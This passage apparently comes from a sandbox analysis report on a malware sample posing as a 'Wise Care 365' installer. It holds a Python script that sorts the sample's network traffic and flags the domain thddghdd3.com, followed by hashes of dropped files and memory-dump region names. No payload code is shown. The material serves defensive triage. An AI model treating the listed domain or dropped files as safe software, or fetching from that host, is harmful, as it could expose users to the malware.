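    ("8.8.8.8:53", "196.249.167.52.in-addr.arpa", "udp"),
    ("8.8.8.8:53", "73.159.190.20.in-addr.arpa", "udp"),
    ("8.8.8.8:53", "thddghdd3.com", "udp"),
    ("8.8.8.8:53", "104.219.191.52.in-addr.arpa", "udp"),
    ("8.8.8.8:53", "tse1.mm.bing.net", "udp"),
    ("150.171.28.10:443", "tse1.mm.bing.net", "tcp"),
    ("150.171.28.10:443", "tse1.mm.bing.net", "tcp"),
    ("8.8.8.8:53", "10.28.171.150.in-addr.arpa", "udp"),
    ("8.8.8.8:53", "14.227.111.52.in-addr.arpa", "udp"),
]

# Hosts the analysis VM contacts on its own. This allowlist is an assumption
# made for the example, not something the report states.
BACKGROUND_HOSTS = {"tse1.mm.bing.net"}

# Hostnames present in the sample's own command lines (from the Processes list).
CMDLINE_HOSTS = {"thddghdd3.com"}


def ptr_to_ip(name):
    """Turn a reverse-lookup name back into the address it resolves, else None."""
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    return ".".join(reversed(name[:-len(suffix)].split(".")))


def triage(rows, cmdline_hosts=CMDLINE_HOSTS, background=BACKGROUND_HOSTS):
    """Bucket each queried domain and note whether a TCP connection followed it."""
    protos_by_domain = defaultdict(set)
    contacted_ips = set()
    for dest, domain, proto in rows:
        protos_by_domain[domain].add(proto)
        if proto == "tcp":
            contacted_ips.add(dest.rsplit(":", 1)[0])

    verdict = {"sample": [], "background": [], "reverse_lookup": [], "unexplained": []}
    for domain, protos in protos_by_domain.items():
        ip = ptr_to_ip(domain)
        if ip is not None:
            # PTR lookups of addresses the VM itself connected to are OS noise.
            verdict["reverse_lookup"].append((domain, ip, ip in contacted_ips))
        elif domain in cmdline_hosts:
            # (domain, connection followed?) -- False means the stage was never fetched.
            verdict["sample"].append((domain, "tcp" in protos))
        elif domain in background:
            verdict["background"].append(domain)
        else:
            verdict["unexplained"].append(domain)
    return verdict


if __name__ == "__main__":
    for bucket, items in triage(NETWORK).items():
        print(f"{bucket}: {items}")
```

Anything left in the `unexplained` bucket is what to look at next; here it is empty, which is consistent with a download stage that never completed rather than a sample that phoned somewhere the rules did not cover.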
Files
memory/1684-1-0x0000000000400000-0x00000000004C0000-memory.dmp
memory/1684-2-0x0000000000401000-0x00000000004A9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp
| MD5 | f098bb35dca6ae44a05c65aac7a5444b |
| SHA1 | c5c50d740c1b8e9d8715fc3b2c8026156295a437 |
| SHA256 | 8a0163353bdcc0882008990b0479c571c91adaca143af8c03da145b28b02e1fe |
| SHA512 | 71d8fc99a67bfc1e2b3635db6092d51d2ae9ec47f652aa10234770e878ab8bfaad69f7b971d54169363763df59ebb33143d161cd2a1cb60bc6fa2bbe6ba0227b |
memory/3960-6-0x0000000000400000-0x000000000067B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
C:\ProgramData\ConsoleApp\ControlSet000.bat
| MD5 | 484c8df5d5bd9d82f4ac1861472cf519 |
| SHA1 | eddc0d20c81d9dba14ee0be32c7c5f563481e792 |
| SHA256 | f240f76de7e18fd3344eb7e5f4d6976a33a331ca12d0aff18032ef99bb3bf953 |
| SHA512 | 6cf730eb19d4b80ce045c17b8e162448d65219be0f0e04ee02245af157ffe9cceb235c182800f44d9260cfa49c44b8e7a8c0a8d1db174a8dad75c33f60bad2b7 |
C:\ProgramData\ConsoleApp\main.bat
| MD5 | 0ddc6dd98f86cff7e50c1621fd16b55a |
| SHA1 | 27e61b2bf7a367c491f25a3ef70df2ef0e38c36a |
| SHA256 | b0a5f27817ebca5a17f75d625f1c73dc0d1c2499f1d155916d5a404013856df6 |
| SHA512 | 07cb691bb23bb75c2c72c3e915b7af1f8b8c831f3d77e81c67f95c5d1ec7f754a7b823b9f1cdecd5cc511a4c34a6e8f0938eaad52f8d6451fee973ecfd2b9609 |
memory/3124-25-0x0000000072B0E000-0x0000000072B0F000-memory.dmp
memory/3124-26-0x0000000004C70000-0x0000000004CA6000-memory.dmp
memory/3124-27-0x0000000005410000-0x0000000005A38000-memory.dmp
memory/3124-28-0x0000000005250000-0x0000000005272000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_taajmkf4.od4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3124-29-0x0000000005B40000-0x0000000005BA6000-memory.dmp
memory/3124-30-0x0000000005BB0000-0x0000000005C16000-memory.dmp
memory/3124-40-0x0000000005D20000-0x0000000006074000-memory.dmp
memory/3124-41-0x0000000006200000-0x000000000621E000-memory.dmp
memory/3124-42-0x0000000006250000-0x000000000629C000-memory.dmp
memory/3124-43-0x0000000007870000-0x0000000007EEA000-memory.dmp
memory/3124-44-0x0000000006710000-0x000000000672A000-memory.dmp
C:\ProgramData\ConsoleApp\7za.exe
| MD5 | c3d309156b8e8cf1d158de5fab1c2b40 |
| SHA1 | 58ad15d91abac2c6203e389ac8a8ff6685406d41 |
| SHA256 | 993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c |
| SHA512 | 2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498 |
C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe
| MD5 | 05fda662bb382c2c95b9318b2394b246 |
| SHA1 | 69365314afb6102209a806e0e474d94e58207ec6 |
| SHA256 | 1cdf90593f92f8de7a6a8b812756ff9359a0a9827f0843ef40e1983f17d6b8d2 |
| SHA512 | b8d792f5529672227b94c55a2e914b8bbc569d9ce70e5c17022a5568dc51febb4fb0a497009d4975f8dc7574989041edf093285d62c34f09d5d55da09869f312 |
memory/5088-52-0x0000000000400000-0x0000000000417000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp
| MD5 | 9d7850e858c24db77b91b25adf93812f |
| SHA1 | f0bb0a9074b38dad7492422247c0a316197d26b6 |
| SHA256 | c062235322d35c79cfde7aea5fd90e9589e5fbca738ed41ab66de382e1a1b2e8 |
| SHA512 | e08084f265913a71d55750b75bbb01d1c43baa68d57eb9d6bc4ed46076577536b10901c06b92c66a926e07e268593b69936050cfacb8ed8e62b8fad86444e8ec |
memory/928-68-0x0000000007130000-0x0000000007146000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-SQCH2.tmp\ISTask.dll
| MD5 | 86a1311d51c00b278cb7f27796ea442e |
| SHA1 | ac08ac9d08f8f5380e2a9a65f4117862aa861a19 |
| SHA256 | e916bdf232744e00cbd8d608168a019c9f41a68a7e8390aa48cfb525276c483d |
| SHA512 | 129e4b8dd2665bcfc5e72b4585343c51127b5d027dbb0234291e7a197baeca1bab5ed074e65e5e8c969ee01f9f65cc52c9993037416de9bfff2f872e5aeba7ec |
C:\Users\Admin\AppData\Local\Temp\is-SQCH2.tmp\VclStylesInno.dll
| MD5 | b0ca93ceb050a2feff0b19e65072bbb5 |
| SHA1 | 7ebbbbe2d2acd8fd516f824338d254a33b69f08d |
| SHA256 | 0e93313f42084d804b9ac4be53d844e549cfcaf19e6f276a3b0f82f01b9b2246 |
| SHA512 | 37242423e62af30179906660c6dbbadca3dc2ba9e562f84315a69f3114765bc08e88321632843dbd78ba1728f8d1ce54a4edfa3b96a9d13e540aee895ae2d8e2 |
memory/928-74-0x0000000007360000-0x000000000767A000-memory.dmp
memory/928-78-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-81-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-84-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-83-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-82-0x00000000077F0000-0x00000000077F1000-memory.dmp
memory/928-80-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-79-0x00000000077E0000-0x00000000077E1000-memory.dmp
memory/928-95-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-99-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-132-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-133-0x0000000007900000-0x0000000007901000-memory.dmp
memory/928-131-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-130-0x00000000078F0000-0x00000000078F1000-memory.dmp
memory/928-128-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-127-0x00000000078E0000-0x00000000078E1000-memory.dmp
memory/928-126-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-125-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-124-0x00000000078D0000-0x00000000078D1000-memory.dmp
memory/928-123-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-122-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-121-0x00000000078C0000-0x00000000078C1000-memory.dmp
memory/928-120-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-119-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-118-0x00000000078B0000-0x00000000078B1000-memory.dmp
memory/928-117-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-116-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-115-0x00000000078A0000-0x00000000078A1000-memory.dmp
memory/928-114-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-113-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-112-0x0000000007890000-0x0000000007891000-memory.dmp
memory/928-111-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-110-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-109-0x0000000007880000-0x0000000007881000-memory.dmp
memory/928-108-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-107-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-106-0x0000000007870000-0x0000000007871000-memory.dmp
memory/928-105-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-104-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-103-0x0000000007860000-0x0000000007861000-memory.dmp
memory/928-102-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-101-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-100-0x0000000007850000-0x0000000007851000-memory.dmp
memory/928-129-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-98-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-97-0x0000000007840000-0x0000000007841000-memory.dmp
memory/928-96-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-92-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-91-0x0000000007820000-0x0000000007821000-memory.dmp
memory/928-90-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-89-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-88-0x0000000007810000-0x0000000007811000-memory.dmp
memory/928-87-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-86-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-85-0x0000000007800000-0x0000000007801000-memory.dmp
memory/928-94-0x0000000007830000-0x0000000007831000-memory.dmp
memory/928-93-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-77-0x0000000007680000-0x00000000077C0000-memory.dmp
memory/928-76-0x00000000077D0000-0x00000000077D1000-memory.dmp
memory/3960-148-0x0000000000400000-0x000000000067B000-memory.dmp